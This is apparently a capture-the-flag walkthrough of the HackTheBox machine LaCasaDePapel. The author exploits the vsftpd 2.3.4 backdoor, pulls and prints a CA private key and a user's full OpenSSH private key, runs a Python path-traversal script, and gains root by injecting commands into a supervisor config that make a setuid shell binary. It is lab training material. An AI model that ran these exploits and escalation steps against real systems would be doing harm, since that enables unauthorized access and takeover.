LaCasaDePapel @ hackthebox

LaCasaDePapel is very interesting linux box with plenty of learning opportunities, like Client authentication with public key, switching between GET and POST requests, different Node web servers running, etc. Although the machine has been marked as easy, it’s more on the intermediate side.

Enumeration

Lets start NMAP

# Nmap 7.70 scan initiated Thu Jul  4 18:22:51 2019 as: nmap -sC -sV -oA nmap 10.10.10.131
Nmap scan report for 10.10.10.131
Host is up (0.028s latency).
Not shown: 948 closed ports, 48 filtered ports
PORT    STATE SERVICE  VERSION
21/tcp  open  ftp      vsftpd 2.3.4
22/tcp  open  ssh      OpenSSH 7.9 (protocol 2.0)
| ssh-hostkey: 
|   2048 03:e1:c2:c9:79:1c:a6:6b:51:34:8d:7a:c3:c7:c8:50 (RSA)
|   256 41:e4:95:a3:39:0b:25:f9:da:de:be:6a:dc:59:48:6d (ECDSA)
|_  256 30:0b:c6:66:2b:8f:5e:4f:26:28:75:0e:f5:b1:71:e4 (ED25519)
80/tcp  open  http     Node.js Express framework
|_http-title: La Casa De Papel
443/tcp open  ssl/http Node.js Express framework
|_http-title: La Casa De Papel
| ssl-cert: Subject: commonName=lacasadepapel.htb/organizationName=La Casa De Papel
| Not valid before: 2019-01-27T08:35:30
|_Not valid after:  2029-01-24T08:35:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
| tls-nextprotoneg: 
|   http/1.1
|_  http/1.0
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jul  4 18:23:33 2019 -- 1 IP address (1 host up) scanned in 42.86 seconds

Looking up the NMAP results – i choose FTP Server would be the first to check and VSFTPD2.3.4 is indeed vulnerable. If you search searchsploit, you’ll just get a metasploit module for it, but i used the Python version of it on the github: https://github.com/In2econd/vsftpd-2.3.4-exploit/blob/master/vsftpd_234_exploit.py

┌─[root@parrot]─[/home/luka/Desktop/htb/LaCasaDePapel/exploit]
└──╼ #./exploit.py 
Usage: ./vsftpd_234_exploit.py <IP address> <port> <command>
Example: ./vsftpd_234_exploit.py 192.168.1.10 21 whoami
┌─[root@parrot]─[/home/luka/Desktop/htb/LaCasaDePapel/exploit]
└──╼ #./exploit.py 10.10.10.131 21 whoami
[*] Attempting to trigger backdoor...
[+] Triggered backdoor
[*] Attempting to connect to backdoor...
[+] Connected to backdoor on 10.10.10.131:6200
[+] Response:
Psy Shell v0.9.9 (PHP 7.2.10 — cli) by Justin Hileman

Good but weird thing is, that we get some Psy Shell afterwards. Since i am not Web Developer, was that completely new to me, but i do find the project very useful. You can read more about Psy Shell here: https://presentate.com/bobthecow/talks/php-for-pirates

Of course a Psy Shell newbie needs some time to get used to it, but as always – there is HELP for every option that there is, so with a little common sense i managed to find the variable $tokyo and a script in it.

show $tokyo
  > 2| class Tokyo {
    3|  private function sign($caCert,$userCsr) {
    4|          $caKey = file_get_contents('/home/nairobi/ca.key');
    5|          $userCert = openssl_csr_sign($userCsr, $caCert, $caKey, 365, ['digest_alg'=>'sha256']);
    6|          openssl_x509_export($userCert, $userCertOut);
    7|          return $userCertOut;
    8|  }
    9| }

file_get_contents('/home/nairobi/ca.key')
=> """
   -----BEGIN PRIVATE KEY-----\n
   MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQDPczpU3s4Pmwdb\n
   7MJsi//m8mm5rEkXcDmratVAk2pTWwWxudo/FFsWAC1zyFV4w2KLacIU7w8Yaz0/\n
   2m+jLx7wNH2SwFBjJeo5lnz+ux3HB+NhWC/5rdRsk07h71J3dvwYv7hcjPNKLcRl\n
   uXt2Ww6GXj4oHhwziE2ETkHgrxQp7jB8pL96SDIJFNEQ1Wqp3eLNnPPbfbLLMW8M\n
   YQ4UlXOaGUdXKmqx9L2spRURI8dzNoRCV3eS6lWu3+YGrC4p732yW5DM5Go7XEyp\n
   s2BvnlkPrq9AFKQ3Y/AF6JE8FE1d+daVrcaRpu6Sm73FH2j6Xu63Xc9d1D989+Us\n
   PCe7nAxnAgMBAAECggEAagfyQ5jR58YMX97GjSaNeKRkh4NYpIM25renIed3C/3V\n
   Dj75Hw6vc7JJiQlXLm9nOeynR33c0FVXrABg2R5niMy7djuXmuWxLxgM8UIAeU89\n
   1+50LwC7N3efdPmWw/rr5VZwy9U7MKnt3TSNtzPZW7JlwKmLLoe3Xy2EnGvAOaFZ\n
   /CAhn5+pxKVw5c2e1Syj9K23/BW6l3rQHBixq9Ir4/QCoDGEbZL17InuVyUQcrb+\n
   q0rLBKoXObe5esfBjQGHOdHnKPlLYyZCREQ8hclLMWlzgDLvA/8pxHMxkOW8k3Mr\n
   uaug9prjnu6nJ3v1ul42NqLgARMMmHejUPry/d4oYQKBgQDzB/gDfr1R5a2phBVd\n
   I0wlpDHVpi+K1JMZkayRVHh+sCg2NAIQgapvdrdxfNOmhP9+k3ue3BhfUweIL9Og\n
   7MrBhZIRJJMT4yx/2lIeiA1+oEwNdYlJKtlGOFE+T1npgCCGD4hpB+nXTu9Xw2bE\n
   G3uK1h6Vm12IyrRMgl/OAAZwEQKBgQDahTByV3DpOwBWC3Vfk6wqZKxLrMBxtDmn\n
   sqBjrd8pbpXRqj6zqIydjwSJaTLeY6Fq9XysI8U9C6U6sAkd+0PG6uhxdW4++mDH\n
   CTbdwePMFbQb7aKiDFGTZ+xuL0qvHuFx3o0pH8jT91C75E30FRjGquxv+75hMi6Y\n
   sm7+mvMs9wKBgQCLJ3Pt5GLYgs818cgdxTkzkFlsgLRWJLN5f3y01g4MVCciKhNI\n
   ikYhfnM5CwVRInP8cMvmwRU/d5Ynd2MQkKTju+xP3oZMa9Yt+r7sdnBrobMKPdN2\n
   zo8L8vEp4VuVJGT6/efYY8yUGMFYmiy8exP5AfMPLJ+Y1J/58uiSVldZUQKBgBM/\n
   ukXIOBUDcoMh3UP/ESJm3dqIrCcX9iA0lvZQ4aCXsjDW61EOHtzeNUsZbjay1gxC\n
   9amAOSaoePSTfyoZ8R17oeAktQJtMcs2n5OnObbHjqcLJtFZfnIarHQETHLiqH9M\n
   WGjv+NPbLExwzwEaPqV5dvxiU6HiNsKSrT5WTed/AoGBAJ11zeAXtmZeuQ95eFbM\n
   7b75PUQYxXRrVNluzvwdHmZEnQsKucXJ6uZG9skiqDlslhYmdaOOmQajW3yS4TsR\n
   aRklful5+Z60JV/5t2Wt9gyHYZ6SYMzApUanVXaWCCNVoeq+yvzId0st2DRl83Vc\n
   53udBEzjt3WPqYGkkDknVhjD\n
   -----END PRIVATE KEY-----\n
   """

We can also use functions lie scandir to scan the directories etc.

scandir('./home/berlin')
=> [
     ".",
     "..",
     ".ash_history",
     ".ssh",
     "downloads",
     "node_modules",
     "server.js",
     "user.txt",
   ]
scandir('./home/berlin/.ssh')
PHP Warning:  scandir(./home/berlin/.ssh): failed to open dir: Permission denied in phar://eval()'d code on line 1
scandir('./home/berlin/downloads')
=> [
     ".",
     "..",
     "SEASON-1",
     "SEASON-2",
     "Select a season",
   ]
LaCasaDePapel @ hackthebox

Exploitation (+ Enumeration)

Since there is posiblility to run different PHP functions (exept system commands like Exec(), system_exec(),…) – i have to confess that i did poked around in different directories, and tried to read different files (user.txt can be read by the way). But to not lose the focus on the Private key that it was just obtained, i suggest to continue with that first.

Since on port 80 there wasn’t much going on, i focused myself on port 443 and https instead. For that, we need to get token first using GET request. We need to use that token to be able to sent POST request

LaCasaDePapel @ hackthebox
LaCasaDePapel @ hackthebox
LaCasaDePapel @ hackthebox

After presenting that token, web server expects client certificate.
We can generate one on the website, clicking on the “Online CSR Generator”

LaCasaDePapel @ hackthebox

We have to sign CSR with the private key that we’ve got

openssl x509 -req -in csr.csr -CA ca.pem -CAkey ca.key -out client.pem -days 365 -CAcreateserial
openssl pkcs12 -export -out certificate.p12 -inkey privateKey.key -in certificate.crt -certfile CACert.crt

If our key was setup correctly, we will see new content that will be loaded.

┌─[root@parrot]─[/home/luka/Desktop/htb/LaCasaDePapel]
└──╼ #curl -k -X GET https://10.10.10.131/  --cert ./client.pem --key client.key
...
<div>
<h1>PRIVATE AREA</h1>
<img id="img_wait" src="waiting.gif">
<h2 id="h2_wait">CONECTION TO SERVER<br>
PLEASE WAIT</h2>
<ul id="ui_list" style="display:none">
<li><a href="?path=SEASON-1">SEASON-1</a></li>
<li><a href="?path=SEASON-2">SEASON-2</a></li>
<li><strong>Select a season</strong></li>
</ul>
</div>
</body>
...
┌─[✗]─[root@parrot]─[/home/luka/Desktop/htb/LaCasaDePapel]
└──╼ #curl -k -X GET https://10.10.10.131?path=SEASON-1  --cert ./client.pem --key client.key -s | tidy
...
<h2 id="h2_wait">CONECTION TO SERVER<br>
PLEASE WAIT</h2>
<ul id="ui_list" style="display:none">
<li><a href="/file/U0VBU09OLTEvMDEuYXZp">01.avi</a></li>
<li><a href="/file/U0VBU09OLTEvMDIuYXZp">02.avi</a></li>
<li><a href="/file/U0VBU09OLTEvMDMuYXZp">03.avi</a></li>
<li><a href="/file/U0VBU09OLTEvMDQuYXZp">04.avi</a></li>
<li><a href="/file/U0VBU09OLTEvMDUuYXZp">05.avi</a></li>
<li><a href="/file/U0VBU09OLTEvMDYuYXZp">06.avi</a></li>
<li><a href="/file/U0VBU09OLTEvMDcuYXZp">07.avi</a></li>
<li><a href="/file/U0VBU09OLTEvMDguYXZp">08.avi</a></li>
<li><a href="/file/U0VBU09OLTEvMDkuYXZp">09.avi</a></li>
<li><a href="/file/U0VBU09OLTEvMTAuYXZp">10.avi</a></li>
<li><a href="/file/U0VBU09OLTEvMTEuYXZp">11.avi</a></li>
<li><a href="/file/U0VBU09OLTEvMTIuYXZp">12.avi</a></li>
<li><a href="/file/U0VBU09OLTEvMTMuYXZp">13.avi</a></li>
<li><strong>Donwload a video</strong></li>
</ul>
...
LaCasaDePapel @ hackthebox

If we check the files in the each directory, we notice that names actually can be decoded.

┌─[root@parrot]─[/home/luka/Desktop/htb/LaCasaDePapel]
└──╼ #for i in $(cat ./files);do echo $i | base64 -d >>file1; printf "\r\n" >>file1; done
┌─[root@parrot]─[/home/luka/Desktop/htb/LaCasaDePapel]
└──╼ #cat file1
SEASON-1/01.avi
SEASON-1/03.avi
SEASON-1/04.avi
SEASON-1/05.avi
SEASON-1/06.avi
SEASON-1/07.avi
SEASON-1/08.avi
SEASON-1/09.avi
SEASON-1/10.avi
SEASON-1/11.avi
SEASON-1/12.avi
SEASON-1/13.avi

We can get LFI.

LaCasaDePapel @ hackthebox

Since i didn’t know how to continue i wrote script to enumerate the system.

┌─[luka@parrot]─[~/Desktop/htb/LaCasaDePapel]
└──╼ $cat ./reques.py 
#!/usr/bin/env python3
import requests
import sys
import base64

#disable warnings
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

base64.b64encode(bytes('your string', 'utf-8'))
directory = str("../../../.." + sys.argv[1])
print("trying" + directory + '\n')

b64directory = base64.b64encode(bytes(directory, 'UTF-8')).decode('UTF-8')
url = 'https://10.10.10.131/file/' + b64directory

#print('trying ' + b64directory)

headers = {'content-type': 'text/html', 'Accept-Charset': 'UTF-8'}
r = requests.get(url, cert=('./client.pem', './client.key'), headers=headers, verify=False)
print(r.text)

Eventually i have found OpenSSH private key.

┌─[luka@parrot]─[~/Desktop/htb/LaCasaDePapel]
└──╼ $./reques.py /home/berlin/.ssh/id_rsa
trying../../../../home/berlin/.ssh/id_rsa

-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

We can login with that key, but not with “professor” user instead

LaCasaDePapel @ hackthebox

In the home folder from professor, we will find two interesting files, memcached. ini and memcached.js . We can write into memcached.js, since this group belongs to “nobody”.

lacasadepapel [~]$ ls -la
total 24
drwxr-sr-x    4 professo professo      4096 Jul 17 12:03 .
drwxr-xr-x    7 root     root          4096 Feb 16 18:06 ..
lrwxrwxrwx    1 root     professo         9 Nov  6  2018 .ash_history -> /dev/null
drwx------    2 professo professo      4096 Jul 17 10:36 .ssh
-rw-r--r--    1 professo professo        24 Jul 17 12:04 memcached.ini
-rw-r-----    1 root     nobody         434 Jan 29 01:24 memcached.js
drwxr-sr-x    9 root     professo      4096 Jan 29 01:31 node_modules
lacasadepapel [~]$ echo "command = nc -lnvp 9999" > memcached.ini

We can also see the memcached.js process being run from “nobody”.

LaCasaDePapel @ hackthebox

Privilege Escalation

For privilege escalation i created simple file that assignes UID and GID of 0 (root) to the user that runs a file and starts shell.

lacasadepapel [~]$ gcc root.c -o root.me                                                                                          
root.c: In function 'main':   
root.c:3:1: warning: implicit declaration of function 'setgid' [-Wimplicit-function-declaration]
 setgid(0);              
 ^~~~~~                         
root.c:4:1: warning: implicit declaration of function 'setuid' [-Wimplicit-function-declaration]
 setuid(0);                   
 ^~~~~~                        
root.c:5:1: warning: implicit declaration of function 'execl' [-Wimplicit-function-declaration]
 execl("/bin/bash", "sh", 0);    
 ^~~~~                          
root.c:5:1: warning: incompatible implicit declaration of built-in function 'execl'
root.c:5:1: warning: missing sentinel in function call [-Wformat=]

lacasadepapel [~]$ cat memcached.ini 
[program:memcached]
command = sudo -u nobody /usr/bin/node /home/professor/memcached.js
command = sudo -u root /bin/bash -c "chown root:root /home/professor/root.me; chmod u+s /home/professor/root.me"
lacasadepapel [~]$ cat root.c
int main(void)
{
setgid(0);
setuid(0);
execl("/bin/bash", "sh", 0);
}
lacasadepapel [~]$ ls -la
total 48
drwxr-sr-x    4 professo professo      4096 Jul 17 14:09 .
drwxr-xr-x    7 root     root          4096 Feb 16 18:06 ..
lrwxrwxrwx    1 root     professo         9 Nov  6  2018 .ash_history -> /dev/null
drwx------    2 professo professo      4096 Jan 31 21:36 .ssh
-rw-r--r--    1 professo professo       201 Jul 17 14:14 memcached.ini
-rw-r-----    1 root     nobody         434 Jan 29 01:24 memcached.js
drwxr-sr-x    9 root     professo      4096 Jan 29 01:31 node_modules
-rw-r--r--    1 professo professo       152 Jul 17 13:53 prepare.txt
-rw-r--r--    1 professo professo       148 Jul 17 14:02 prepare2.txt
-rw-r--r--    1 professo professo        70 Jul 17 14:08 root.c
-rwsr-xr-x    1 root     root         10672 Jul 17 14:09 root.me
lacasadepapel [~]$ id
uid=1002(professor) gid=1002(professor) groups=1002(professor)
lacasadepapel [~]$ ./root.me 
lacasadepapel [~]$ id
uid=0(root) gid=0(root) groups=1002(professor)
lacasadepapel [~]$ cat /root/
.ash_history  .cache/       .config/      .node-gyp/    .npm/         .rnd          .ssh/         root.txt      
lacasadepapel [~]$ cat /root/root.txt 
*deleted*